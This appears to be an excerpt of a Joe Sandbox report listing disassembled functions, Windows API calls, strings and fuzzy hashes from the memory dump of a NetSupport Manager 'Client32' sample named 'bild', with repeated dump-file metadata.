                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountTick$DeleteObject
                                                                                    • String ID: BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s
                                                                                    • API String ID: 3011517232-3209293507
                                                                                    • Opcode ID: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                    • Instruction ID: 71694b1901628e7c3f0e0f97bec8b89b6520565b9ddb22d4603e25af3e6b7442
                                                                                    • Opcode Fuzzy Hash: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                    • Instruction Fuzzy Hash: 62414F75A00F058FD724CF79CD856ABF7E1FF84219F104A3ED56A9A244EB3565418F00
                                                                                    Function 11077200 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 11077241
                                                                                    • CopyRect.USER32(?,00000004), ref: 1107726F
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    • m_hWnd, xrefs: 1107722E
                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077229
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                    • API String ID: 2755825785-2830328467
                                                                                    • Opcode ID: 52b039dbae3ac474573174c2f07e54e0dc35dacba2b0f62a005c55ea2bccfa41
                                                                                    • Instruction ID: de278a2cd4c0b5f0839ddad857aefe36ed68345845b5ae66c69d21e7740d687e
                                                                                    • Opcode Fuzzy Hash: 52b039dbae3ac474573174c2f07e54e0dc35dacba2b0f62a005c55ea2bccfa41
                                                                                    • Instruction Fuzzy Hash: 3841A331E00A06DBCB14CE68C9C8A5EF7F1FF84344F10C569E86597644EB30E941CB58
                                                                                    Function 110D1090 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memmove.LIBCMT ref: 110D1128
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                    • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                    • API String ID: 1528188558-323366856
                                                                                    • Opcode ID: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                    • Instruction ID: cd45fd8f54c028a965d30ceca3f2b81ac61ec80aecbdd09916459db7febd3670
                                                                                    • Opcode Fuzzy Hash: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                    • Instruction Fuzzy Hash: AE21263EB003476BDB11DE69EC50F9BB7D99FC528CB108498F98887301EE72F4058294
                                                                                    Function 110893D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(00000000,0000000E), ref: 1115FFD1
                                                                                      • Part of subcall function 1115FE60: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 1115FE98
                                                                                      • Part of subcall function 1115FE60: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 1115FED9
                                                                                      • Part of subcall function 1115FE60: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 1115FEFD
                                                                                      • Part of subcall function 1115FE60: RegCloseKey.ADVAPI32(?), ref: 1115FF2A
                                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?), ref: 1115FF93
                                                                                    • LoadLibraryA.KERNEL32(hhctrl.ocx,?,?,?,?), ref: 1115FFA9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
                                                                                    • String ID: hhctrl.ocx
                                                                                    • API String ID: 1060647816-2298675154
                                                                                    • Opcode ID: a3853af9b5ec3e1502db0b4bafb9ef45656db84a0f437c905b28bfddd73cca6c
                                                                                    • Instruction ID: 21cf1aba31526e8ead5fc6aa4b71c903af58d6e9e090c4be98d1d971a6eb0305
                                                                                    • Opcode Fuzzy Hash: a3853af9b5ec3e1502db0b4bafb9ef45656db84a0f437c905b28bfddd73cca6c
                                                                                    • Instruction Fuzzy Hash: E911663260826B9BDB84DF65C994BDAF7A8EB4B758B41003FE521D3544EB70D844CB92
                                                                                    Function 110B91D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B91EF
                                                                                    • MoveWindow.USER32(8D111939,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA3F5), ref: 110B9228
                                                                                    • SetTimer.USER32(8D111939,0000050D,000007D0,00000000), ref: 110B9260
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoMoveParametersSystemTimerWindow
                                                                                    • String ID: Max
                                                                                    • API String ID: 1521622399-2772132969
                                                                                    • Opcode ID: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                    • Instruction ID: cbc035c590c08491bc6b7e29ca505f880cfdd662cf6ac53e8412c44867f4f71a
                                                                                    • Opcode Fuzzy Hash: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                    • Instruction Fuzzy Hash: EA2130B5A40309AFD714CFA4C885FAFF7B8FB48714F10452EE95597380CA70A941CBA0
                                                                                    Function 110ED0F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsWindow.USER32(?), ref: 110ED118
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                    • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                    • API String ID: 2577986331-1331251348
                                                                                    • Opcode ID: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                    • Instruction ID: a6e56e2616b3f757a7bedb7841b960acd04ffc41865bfa7298ab7df9715bb4c1
                                                                                    • Opcode Fuzzy Hash: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                    • Instruction Fuzzy Hash: 85F02735F02126BBC6228E579C09F8EB378CF90BACF0200A4F81C26140E734B51082D5
                                                                                    Function 110813C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 11081417
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                    • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                    • API String ID: 2441568934-1875806619
                                                                                    • Opcode ID: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                    • Instruction ID: 32575625ee732fca108261b890e952c9fd6c17214e61566243eaf6e55242290c
                                                                                    • Opcode Fuzzy Hash: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                    • Instruction Fuzzy Hash: D1F0A0BCE086651BD730DE99BC00FCAB7D05F1434CF050498EA8627682DBBA7549C2E6
                                                                                    Function 11061140 Relevance: 6.1, APIs: 4, Instructions: 131registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                    • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                    • RegEnumValueA.ADVAPI32(?,00000001,?,00000080,00000000,?,?,00000480), ref: 110612C3
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 110612D4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EnumValue$CloseOpen
                                                                                    • String ID:
                                                                                    • API String ID: 3785232357-0
                                                                                    • Opcode ID: 385e5134d3de21a01a15670ba88f4417c14cd2c8775287df043cdc8206fa1483
                                                                                    • Instruction ID: e119b506798adee895546c353bca4cd72f80153627c59e78ac85c5ed933e93b3
                                                                                    • Opcode Fuzzy Hash: 385e5134d3de21a01a15670ba88f4417c14cd2c8775287df043cdc8206fa1483
                                                                                    • Instruction Fuzzy Hash: 14412CB190061E9EDB20CB54CC84FDBBBBDAB89305F0045D9E649D7141EA70AA98CFA0
                                                                                    Function 110291D0 Relevance: 6.1, APIs: 4, Instructions: 104sleepthreadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateThread.KERNEL32(00000000,00001000,11027030,00000000,00000000,111ED468), ref: 110291F3
                                                                                    • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029212
                                                                                    • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029234
                                                                                    • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102923C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: SleepThread$CreateMessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 3347742789-0
                                                                                    • Opcode ID: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                    • Instruction ID: 6c329cfe7713c70c74540dd837a6755ec0a493dd99a0e0f492d5b7c5eaff94cf
                                                                                    • Opcode Fuzzy Hash: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                    • Instruction Fuzzy Hash: E831D476D42230ABD602DBDCCC80FAABBA8A755758F914134F9395B6C8D6717805CBD0
                                                                                    Function 110B3230 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(0000002C,420B7E12,?,?,00000000,00000000,?,Function_00182078,000000FF,?,1103D500,?,?,?,00000000,420B7E12), ref: 110B325F
                                                                                    • LeaveCriticalSection.KERNEL32(0000002C,?,1103D500,?,?,?,00000000,420B7E12,?,?,00000000,?,00000015,00000000), ref: 110B329F
                                                                                    • SetEvent.KERNEL32(?), ref: 110B331A
                                                                                    • LeaveCriticalSection.KERNEL32(0000002C), ref: 110B3321
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$EnterEvent
                                                                                    • String ID:
                                                                                    • API String ID: 3394196147-0
                                                                                    • Opcode ID: fd4f52dacf6346c68deca50a419aba338554c765379c0af81f02942a775e7cd5
                                                                                    • Instruction ID: 1c2cd706bfc580d94f6c8d94d17799be7df3d247d13d912ddb644fcd1bc25a9e
                                                                                    • Opcode Fuzzy Hash: fd4f52dacf6346c68deca50a419aba338554c765379c0af81f02942a775e7cd5
